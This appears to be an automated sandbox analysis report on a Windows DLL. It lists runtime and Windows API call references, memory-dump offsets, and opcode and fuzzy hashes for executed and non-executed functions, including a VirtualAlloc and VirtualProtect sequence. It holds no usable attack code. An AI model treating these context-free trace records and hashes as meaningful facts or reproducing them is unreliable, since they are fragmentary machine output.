                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Getcvt
                                                                                                                • String ID: :-!n
                                                                                                                • API String ID: 3195005509-2832354262
                                                                                                                • Opcode ID: af59d48200bfb49d95c26c3de468ad4e2ded3a65962d09ae2290552a0f0d2ac0
                                                                                                                • Instruction ID: ba103a65d1817a6e9d1db39e881238b01c868cf51cf339266f5aed383a9f879e
                                                                                                                • Opcode Fuzzy Hash: af59d48200bfb49d95c26c3de468ad4e2ded3a65962d09ae2290552a0f0d2ac0
                                                                                                                • Instruction Fuzzy Hash: 3841E231A1834EFFEB118FA9D854BDA7BFAAF42311F104429EA50AB181D771DA60CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 6E2282D8
                                                                                                                  • Part of subcall function 6E21B1C8: __FF_MSGBANNER.LIBCMT ref: 6E21B1DF
                                                                                                                  • Part of subcall function 6E21B1C8: __NMSG_WRITE.LIBCMT ref: 6E21B1E6
                                                                                                                  • Part of subcall function 6E21B1C8: RtlAllocateHeap.NTDLL(6E2E134C,00000000,00000001), ref: 6E21B20B
                                                                                                                • _free.LIBCMT ref: 6E2282EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1020059152-0
                                                                                                                • Opcode ID: 48d133770aa4651f5510f396803b129f48752d106f285646dc335b8900818011
                                                                                                                • Instruction ID: e7c3332a63fd1150931405ab8ec4379f71a275a967e4c17dc63e9df42af4b1b1
                                                                                                                • Opcode Fuzzy Hash: 48d133770aa4651f5510f396803b129f48752d106f285646dc335b8900818011
                                                                                                                • Instruction Fuzzy Hash: 3611E336508A1EEFDB191FF4AC08AC93BEFAF19375B108935EA449A140DF31C941C6A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traitsconstruct
                                                                                                                • String ID: ?4!n$?4!n
                                                                                                                • API String ID: 489808500-3570167787
                                                                                                                • Opcode ID: 85811ac18fd8534f21fa2f850b38544643cc734c9d18070ded0633f94fb930eb
                                                                                                                • Instruction ID: 7d5febfb8172f4bdeb4684691548ca2529318c621e45eb7f7eb1ebd96deb58b4
                                                                                                                • Opcode Fuzzy Hash: 85811ac18fd8534f21fa2f850b38544643cc734c9d18070ded0633f94fb930eb
                                                                                                                • Instruction Fuzzy Hash: EA11CC79604208AFCB08CF94D890EDE7BB6FF88354F108598E9495B355D731EA41CBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traits$std::ios_base::width
                                                                                                                • String ID:
                                                                                                                • API String ID: 735177774-0
                                                                                                                • Opcode ID: 0fe54fa5b3d842013cfef78241c6758916bdccc5df3ea66db808a92a1b631dd3
                                                                                                                • Instruction ID: 0b1fab4fe2f188615ef8c77034ce72544147601c456761ddbe2cac4a1afa3d19
                                                                                                                • Opcode Fuzzy Hash: 0fe54fa5b3d842013cfef78241c6758916bdccc5df3ea66db808a92a1b631dd3
                                                                                                                • Instruction Fuzzy Hash: C6B1E6B990420DDFDB08CFD8C890AEEBBF6FF49308F108519E605AB254D735AA41DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Mpunctstd::ios_base::getloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 76177404-0
                                                                                                                • Opcode ID: 490ce9017b6475a8ba7621ba47143057c1714db8d2031153baee091b50eeb642
                                                                                                                • Instruction ID: c7acf2c8391c7094a8cd45f5e7dad883f490483cd7add3fbaa8985f5d4914d05
                                                                                                                • Opcode Fuzzy Hash: 490ce9017b6475a8ba7621ba47143057c1714db8d2031153baee091b50eeb642
                                                                                                                • Instruction Fuzzy Hash: 3371E0B690420D9FCB08DFD5C890AEEB7FABF49314F14851DE615A7290DB349A45CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2782032738-0
                                                                                                                • Opcode ID: 68325089c4cc5d4c7e068de3ce2e56d884387ac5d5f90d0dd688e5e7e7a9a207
                                                                                                                • Instruction ID: 008c7a2449758b2b550edd0f32593907697e41b1c53c27cd715e755350f89549
                                                                                                                • Opcode Fuzzy Hash: 68325089c4cc5d4c7e068de3ce2e56d884387ac5d5f90d0dd688e5e7e7a9a207
                                                                                                                • Instruction Fuzzy Hash: 6941C53561860F9FEB088EE9C8909DFB7E7AF85361B20853DEA25C7684D7B1DB408740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E229878
                                                                                                                • __isleadbyte_l.LIBCMT ref: 6E2298A6
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,6E225423,00000001,00000000,00000000,?,00000000), ref: 6E2298D4
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,6E225423,00000001,00000000,00000000,?,00000000), ref: 6E22990A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: b063e5d040cd20e331587a04f9f4da1c787a9fbd5823e89a488e8b24219086e0
                                                                                                                • Instruction ID: 408e7d9c395ed6fcf74fa8f3bd9b0136eaf24798f7fb8953062f43671651a2f2
                                                                                                                • Opcode Fuzzy Hash: b063e5d040cd20e331587a04f9f4da1c787a9fbd5823e89a488e8b24219086e0
                                                                                                                • Instruction Fuzzy Hash: F931EF31A0424FAFEB158EB5CC44BAA7BBBFF45321F054539E8648B1A0E731D861DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction ID: cc1949711802f7a3b47d53af12d98b9f8943f2478e121ff058db8d69ab1d7b08
                                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction Fuzzy Hash: E601363645418EBFCF525ED4DCA1CEE3F37BB19255B488925FA2858030D736C9B2AB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBCMT ref: 6E21D320
                                                                                                                  • Part of subcall function 6E21D948: ___BuildCatchObjectHelper.LIBCMT ref: 6E21D97A
                                                                                                                  • Part of subcall function 6E21D948: ___AdjustPointer.LIBCMT ref: 6E21D991
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6E21D337
                                                                                                                • ___FrameUnwindToState.LIBCMT ref: 6E21D349
                                                                                                                • CallCatchBlock.LIBCMT ref: 6E21D36D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2901542994-0
                                                                                                                • Opcode ID: 77e9ce4982eeffa73c95e3f9bac00cf9d2fbf83d4ade13bb3658eac0e05ddc5c
                                                                                                                • Instruction ID: 8e0e736e60da1f1cac3ffd6487637add9c639f6ac7fe8c13deefdccef4ef35b4
                                                                                                                • Opcode Fuzzy Hash: 77e9ce4982eeffa73c95e3f9bac00cf9d2fbf83d4ade13bb3658eac0e05ddc5c
                                                                                                                • Instruction Fuzzy Hash: 8101F03640810DFBCF129F95CD00EEA7BAAAF8975AF054525FA1866120C336E661DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: swprintf
                                                                                                                • String ID: $$$
                                                                                                                • API String ID: 233258989-233714265
                                                                                                                • Opcode ID: 21634d7a172fd0ceb5db1cc6c9d12996e4abdd71949996e17e277361e737b1c1
                                                                                                                • Instruction ID: ca384f9bcbf052d9c7c6e66e150e0ce099d286c406567f9f777a5407032e9b70
                                                                                                                • Opcode Fuzzy Hash: 21634d7a172fd0ceb5db1cc6c9d12996e4abdd71949996e17e277361e737b1c1
                                                                                                                • Instruction Fuzzy Hash: FD815B71908A1DCFDB15CFA8C850BDAB7F6BF46300F008199EA49A7280EB349B95CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: swprintf
                                                                                                                • String ID: $$$
                                                                                                                • API String ID: 233258989-233714265
                                                                                                                • Opcode ID: 29560a7716887d3607267bea864dc9d45efeebb6aad5fa58dc8a1797dab71ca1
                                                                                                                • Instruction ID: 983f7e86c2b1f28e6be0793869f8b90e20d0497db39bd0d31f341eddce5ee47f
                                                                                                                • Opcode Fuzzy Hash: 29560a7716887d3607267bea864dc9d45efeebb6aad5fa58dc8a1797dab71ca1
                                                                                                                • Instruction Fuzzy Hash: 0E81287590461DCFDB25CFA8C850BDAB7F6BF86304F008599EA49A7280DB348AD5CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6E213C74
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6E213CD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::ios_base::good
                                                                                                                • String ID: 2)!n
                                                                                                                • API String ID: 3100596842-1785711589
                                                                                                                • Opcode ID: cbed7ae0a68a047394c5b755034d5eb4506c52b0c2536c9096676ce9e246dd77
                                                                                                                • Instruction ID: 9fefaae83378b6112bd8de6738055f8bab52f0019740e9c2c4fc6d12a679f600
                                                                                                                • Opcode Fuzzy Hash: cbed7ae0a68a047394c5b755034d5eb4506c52b0c2536c9096676ce9e246dd77
                                                                                                                • Instruction Fuzzy Hash: 3021ED7960420DAFCB08CF54C890AAEBBB7FF89354F14CA59E9154B391CB31EA41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                • std::locale::locale.LIBCPMTD ref: 6E2117EB
                                                                                                                  • Part of subcall function 6E213B70: std::locale::_Init.LIBCPMT ref: 6E213B79
                                                                                                                • _setlocale.LIBCMT ref: 6E2117FE
                                                                                                                  • Part of subcall function 6E21C33C: _mbstowcs_s.LIBCMT ref: 6E21C362
                                                                                                                  • Part of subcall function 6E21C33C: __invoke_watson.LIBCMT ref: 6E21C37D
                                                                                                                  • Part of subcall function 6E21C33C: __calloc_crt.LIBCMT ref: 6E21C387
                                                                                                                • SetConsoleOutputCP.KERNEL32(000004E3), ref: 6E21181E
                                                                                                                • GetModuleFileNameA.KERNELBASE(00000000,6E24CB58,000008C6,?,?,00000006,00000000), ref: 6E211850
                                                                                                                • SetConsoleCP.KERNEL32(00000000), ref: 6E2118D9
                                                                                                                • _malloc.LIBCMT ref: 6E2118E4
                                                                                                                • GetCurrentDirectoryA.KERNEL32(000008C6,?,00000000), ref: 6E211A5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Console$CurrentDirectoryFileInitModuleNameOutput__calloc_crt__invoke_watson_malloc_mbstowcs_s_setlocalestd::locale::_std::locale::locale
                                                                                                                • String ID: ^9DGU
                                                                                                                • API String ID: 1969868346-529033273
                                                                                                                • Opcode ID: 408f8d4093a1337ca981f66069695afbfea8b1610b4988a164c07ea7b35782b8
                                                                                                                • Instruction ID: ebceaccab04a5794dd9ef913fa29cfff9e66d670fb69624f53b39fd53676240f
                                                                                                                • Opcode Fuzzy Hash: 408f8d4093a1337ca981f66069695afbfea8b1610b4988a164c07ea7b35782b8
                                                                                                                • Instruction Fuzzy Hash: 0D42487190461CDFCB19EFA8D988B9CBBF3FB5A309F10911AE525AB248E7706545CF20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,000008D2,00003000,00000040,000008D2,6E24DD28), ref: 6E24E395
                                                                                                                • VirtualAlloc.KERNEL32(00000000,000000BC,00003000,00000040,6E24DD8A), ref: 6E24E3CC
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00014035,00003000,00000040), ref: 6E24E42C
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24E462
                                                                                                                • VirtualProtect.KERNEL32(6E1F0000,00000000,00000004,6E24E2B7), ref: 6E24E567
                                                                                                                • VirtualProtect.KERNEL32(6E1F0000,00001000,00000004,6E24E2B7), ref: 6E24E58E
                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,6E24E2B7), ref: 6E24E65B
                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,6E24E2B7,?), ref: 6E24E6B1
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24E6CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495341087.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Protect$Alloc$Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2574235972-0
                                                                                                                • Opcode ID: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
                                                                                                                • Instruction ID: 863db9c4489dca3519704cf4dbbf7eebc93fc39de8d13dbb7e2a8b2ec6e0c9f5
                                                                                                                • Opcode Fuzzy Hash: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
                                                                                                                • Instruction Fuzzy Hash: 6ED15D72105701DFEB25EF58C888A71F7A6FF88310B194198ED299F25AD7B0A811EB74
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21304A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213063
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 172949856-0
                                                                                                                • Opcode ID: 3c05249b15fedf4d7580a020de3a2450b1e7498a24adcdc87a336de3d02c1699
                                                                                                                • Instruction ID: f2d0f907327948fa3ce1da43a3092cfdb84b46c2123335d3d46d6f2565de3264
                                                                                                                • Opcode Fuzzy Hash: 3c05249b15fedf4d7580a020de3a2450b1e7498a24adcdc87a336de3d02c1699
                                                                                                                • Instruction Fuzzy Hash: C431F6B5D1821D9FCB08CFE4C955AEEB7FAFB48314F104629E525A7390DB346A04CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::ios_base::_Init.LIBCPMT ref: 6E21A534
                                                                                                                  • Part of subcall function 6E21A074: std::ios_base::clear.LIBCPMTD ref: 6E21A0A3
                                                                                                                  • Part of subcall function 6E21A074: std::locale::_Init.LIBCPMT ref: 6E21A0B8
                                                                                                                  • Part of subcall function 6E21AC30: __EH_prolog3.LIBCMT ref: 6E21AC37
                                                                                                                  • Part of subcall function 6E21AC30: std::ios_base::getloc.LIBCPMTD ref: 6E21AC40
                                                                                                                • std::ios_base::clear.LIBCPMTD ref: 6E21A561
                                                                                                                • std::ios_base::_Addstd.LIBCPMT ref: 6E21A56D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Initstd::ios_base::_std::ios_base::clear$AddstdH_prolog3std::ios_base::getlocstd::locale::_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3327797918-0
                                                                                                                • Opcode ID: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
                                                                                                                • Instruction ID: 3330ee9492993e81e3f88d9e352fdb69f91a0e885b1242d823e0163c6e2bf69b
                                                                                                                • Opcode Fuzzy Hash: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
                                                                                                                • Instruction Fuzzy Hash: 63F0E57550C31867DB20DAF0D440BC777E9AF01239F00481EE68257A80DBB5F7448794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6E21AC37
                                                                                                                • std::ios_base::getloc.LIBCPMTD ref: 6E21AC40
                                                                                                                  • Part of subcall function 6E2188A0: std::locale::locale.LIBCPMTD ref: 6E2188BA
                                                                                                                  • Part of subcall function 6E213020: std::_Lockit::_Lockit.LIBCPMT ref: 6E21304A
                                                                                                                  • Part of subcall function 6E213020: int.LIBCPMTD ref: 6E213063
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3LockitLockit::_std::_std::ios_base::getlocstd::locale::locale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2499403736-0
                                                                                                                • Opcode ID: e888777f6277678fc5c68fadb465dc4156e5c2648d869fee271b694a9f0e48be
                                                                                                                • Instruction ID: f3ee4eb4a4d9258048ef50bc18238b46457d66eaec120d25bff295a46532d5df
                                                                                                                • Opcode Fuzzy Hash: e888777f6277678fc5c68fadb465dc4156e5c2648d869fee271b694a9f0e48be
                                                                                                                • Instruction Fuzzy Hash: D0E01AB590821DDBCB18EBE4C808AEEBBAABF20625F6049189621571D0CB704B01CA90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetUserDefaultLCID.KERNEL32(00000055,?,?,6E22E723,?,00000055,0000009C), ref: 6E222AA4
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 6E222AAB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DefaultDownlevelLocaleNameUser___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 395733334-0
                                                                                                                • Opcode ID: c9ff482c29f6f8456e3c34089fc1f673382ff359eaa3bd6c59e21c965edd2f47
                                                                                                                • Instruction ID: 0823adf91fb090f3f9cfb7e9b20a01ecbde8d1496a5547f6d4669a1b1526c155
                                                                                                                • Opcode Fuzzy Hash: c9ff482c29f6f8456e3c34089fc1f673382ff359eaa3bd6c59e21c965edd2f47
                                                                                                                • Instruction Fuzzy Hash: CBD0C9B741450EAFCF00ABE4EC0986A3BAEBF59714B444450F91C87511D637B160DBB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                APIs
                                                                                                                • _wcscmp.LIBCMT ref: 6E22F2FE
                                                                                                                • _wcscmp.LIBCMT ref: 6E22F30F
                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6E22F5AD,?,00000000), ref: 6E22F32B
                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6E22F5AD,?,00000000), ref: 6E22F355
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale_wcscmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1351282208-0
                                                                                                                • Opcode ID: bbb0cf4fb2b2597535b94a5e9dd7901cb50064d9b9516ce16748e4b0ad8a6b19
                                                                                                                • Instruction ID: f57fbc90acec9668338f7a858cad6cd7b1ac18a21f2ae44297f5d7b9498004c2
                                                                                                                • Opcode Fuzzy Hash: bbb0cf4fb2b2597535b94a5e9dd7901cb50064d9b9516ce16748e4b0ad8a6b19
                                                                                                                • Instruction Fuzzy Hash: 1A01803621561EAFEB519BA8C844ECB37AE9B05766B10C435F918EA180EB60D981CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlDecodePointer.NTDLL ref: 6E222EC5
                                                                                                                • _free.LIBCMT ref: 6E222EDE
                                                                                                                  • Part of subcall function 6E21B190: HeapFree.KERNEL32(00000000,00000000,?,6E2249A1,00000000,?,?,?,00000000,?,6E21CF78,00000018,6E2491C8,00000008,6E21CEC5,?), ref: 6E21B1A4
                                                                                                                  • Part of subcall function 6E21B190: GetLastError.KERNEL32(00000000,?,6E2249A1,00000000,?,?,?,00000000,?,6E21CF78,00000018,6E2491C8,00000008,6E21CEC5,?,6E2117F0), ref: 6E21B1B6
                                                                                                                • _free.LIBCMT ref: 6E222EF1
                                                                                                                • _free.LIBCMT ref: 6E222F0F
                                                                                                                • _free.LIBCMT ref: 6E222F21
                                                                                                                • _free.LIBCMT ref: 6E222F32
                                                                                                                • _free.LIBCMT ref: 6E222F3D
                                                                                                                • _free.LIBCMT ref: 6E222F61
                                                                                                                • RtlEncodePointer.NTDLL(6E2E1328), ref: 6E222F68
                                                                                                                • _free.LIBCMT ref: 6E222F7D
                                                                                                                • _free.LIBCMT ref: 6E222F93
                                                                                                                • _free.LIBCMT ref: 6E222FBB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3064303923-0
                                                                                                                • Opcode ID: 5b5bb7c9301ef248a3c30a0e7afd35ec5b24d1b92594c4c4de5e6a5d03010440
                                                                                                                • Instruction ID: 799979962d3cdf6e5a6397446c016b0074f5cbbe36725c32146b60193166ad93
                                                                                                                • Opcode Fuzzy Hash: 5b5bb7c9301ef248a3c30a0e7afd35ec5b24d1b92594c4c4de5e6a5d03010440
                                                                                                                • Instruction Fuzzy Hash: 802191B7905A6ACFCF189FA4D84C4D937FBA70E7213560439E50897248CB319884CAA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _strcspnctypestd::ios_base::getloc$Mpunct_localeconvstd::ios_base::width
                                                                                                                • String ID: @
                                                                                                                • API String ID: 484443084-2766056989
                                                                                                                • Opcode ID: 902d90ec1dbd6a6bff5a6f224e5f3ff10c48eb46573f78ad390fbe1b9762889e
                                                                                                                • Instruction ID: 68172b4438070352d91321e7d46cf41d073ba7545916c9854bd47da757fb5693
                                                                                                                • Opcode Fuzzy Hash: 902d90ec1dbd6a6bff5a6f224e5f3ff10c48eb46573f78ad390fbe1b9762889e
                                                                                                                • Instruction Fuzzy Hash: 3C021BB591424DDFCB04CFD8C990BEEBBFABF48304F148559E619AB254D734AA41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21314A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213163
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID: xD!n
                                                                                                                • API String ID: 172949856-3737725903
                                                                                                                • Opcode ID: d96d8b36e82e3bf78a0dc4e6e46db0319e29a104ad00c1452de9462ce398307a
                                                                                                                • Instruction ID: 1526b63b973e07b94f63ec4948504a02cb27956ec9b3f848b82e6ea837ad7c94
                                                                                                                • Opcode Fuzzy Hash: d96d8b36e82e3bf78a0dc4e6e46db0319e29a104ad00c1452de9462ce398307a
                                                                                                                • Instruction Fuzzy Hash: 4C31E5B591821DDFCB08CFD4C885AEEB7FABB48314F104629E525A7380DB345A05CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2441703863-2766056989
                                                                                                                • Opcode ID: 7dc808567650502c7f0f2f498eaf718fc9a92b0a3f6abd0c1f725c9ebac6b586
                                                                                                                • Instruction ID: 9e17f60067dce32cf3ccb629134599fd5f2ec4cf591a07700114c87b57f43bdf
                                                                                                                • Opcode Fuzzy Hash: 7dc808567650502c7f0f2f498eaf718fc9a92b0a3f6abd0c1f725c9ebac6b586
                                                                                                                • Instruction Fuzzy Hash: 2DE129B591424D9FCB04CF94C990BEEBBFABF48304F14855DE619AB254D734AE41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traits$_strlenctypestd::ios_base::getlocstd::ios_base::width
                                                                                                                • String ID:
                                                                                                                • API String ID: 2376101104-0
                                                                                                                • Opcode ID: d0c6eebec1b5825cc0edb6de61a1b31256547073392af8b85d58de306a92d1db
                                                                                                                • Instruction ID: e01b2be2b7cdd61ea19651d234833147f6917c1b003d61b7ba67f9e81d0cb02a
                                                                                                                • Opcode Fuzzy Hash: d0c6eebec1b5825cc0edb6de61a1b31256547073392af8b85d58de306a92d1db
                                                                                                                • Instruction Fuzzy Hash: 75D106B990424D9FDB08CFE4C490BEEBBF6BF49308F108519E605AB350DB34AA41DB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6E219B62
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E219B6C
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E219B83
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                • codecvt.LIBCPMT ref: 6E219BA6
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 6E219BBA
